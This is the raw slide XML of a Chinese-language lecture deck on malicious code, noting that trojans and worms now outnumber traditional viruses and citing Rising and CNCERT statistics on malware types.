                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传统意义上的病毒越来越少，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>当前主流恶意代码形式是木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（占绝大多数）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>和蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同恶意代码形式的界限越来越模糊，采用的技术有融合的趋势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE6846C-B26A-4EBF-929E-F835290C636B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35678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274888" y="2895600"/>
            <a:ext cx="5659437" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一、定义</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304F416-3A21-4C63-9976-6E207E607CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1282206"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E52C39-EBD6-4351-83B8-F100ECBBBA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01170890-A8E3-4AB0-B9C9-740634DB1EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="200025" y="1760174"/>
            <a:ext cx="6296025" cy="4752975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C20CC716-5050-49C1-B8FF-225D21317314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867025" y="2245949"/>
            <a:ext cx="6276975" cy="3629025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40569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2658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码种类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1222659" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="1967" t="24710" r="1311" b="3706"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="144463" y="2636838"/>
            <a:ext cx="8964612" cy="3595687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222660" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="423863" y="1406525"/>
            <a:ext cx="8064500" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>年下半年新增病毒的比例（瑞星）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1449465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2658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码种类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222660" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="423863" y="1406525"/>
            <a:ext cx="8307182" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CNCERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中国互联网网络安全报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016666" y="2296100"/>
            <a:ext cx="6819900" cy="3914775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2107119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2658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码种类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222660" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="423863" y="1406525"/>
            <a:ext cx="8307182" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CNCERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中国互联网网络安全报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1048F8-9B60-48A2-ADB1-CCFA5F68C57E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150938" y="1991300"/>
            <a:ext cx="7115175" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38256459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2658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码种类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222660" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="418409" y="1243009"/>
            <a:ext cx="8307182" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CNCERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中国互联网网络安全报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C788B16-95EA-48AA-BD3A-F45B51F46F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038225" y="1969068"/>
            <a:ext cx="7067550" cy="4581525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29292897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zh-CN" altLang="en-US"/>
              <a:t>内容提纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64543" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1660525" y="722313"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="3338513"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64555" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
